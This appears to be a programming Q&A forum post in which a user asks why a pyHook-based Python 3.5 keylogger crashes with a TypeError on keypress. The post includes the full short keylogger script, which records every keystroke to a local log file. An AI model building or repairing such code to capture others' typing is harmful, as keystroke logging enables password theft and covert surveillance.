# Python(3.5.2) - Keylogger Error

Tags: python, typeerror, keylogger

I've been trying to write a Python keylogger (for educational purposes). Here is the code:

```
import pythoncom, pyHook

def OnKeyboardEvent(event):
    keylog = chr(event.Ascii)
    with open("log.txt", "a") as f:
        f.write(keylog)

    return True

hook_manager = pyHook.HookManager()
hook_manager.KeyDown = OnKeyboardEvent
hook_manager.HookKeyboard()
pythoncom.PumpMessages()
```

I ran the script, and by the time I type something, it just crashes with the following error message:

```
TypeError: KeyboardSwitch() missing 8 required positional arguments: 'msg', 'vk_code', 'scan_code', 'ascii', 'flags', 'time', 'hwnd', and 'win_name'
```

I can't figure out what the problem is. I've searched (almost) every single thread on reddit, stackoverflow etc. One thing I have noticed, though, is that users of Python 2.7 seem to be able to run similar scripts. Another thread said that there is a bug in pyHook and it needs rebuilding.

At the moment I'm at a loss regarding what am I supposed to do. Is there something wrong in my code that I should fix? Any ideas?

Thanks.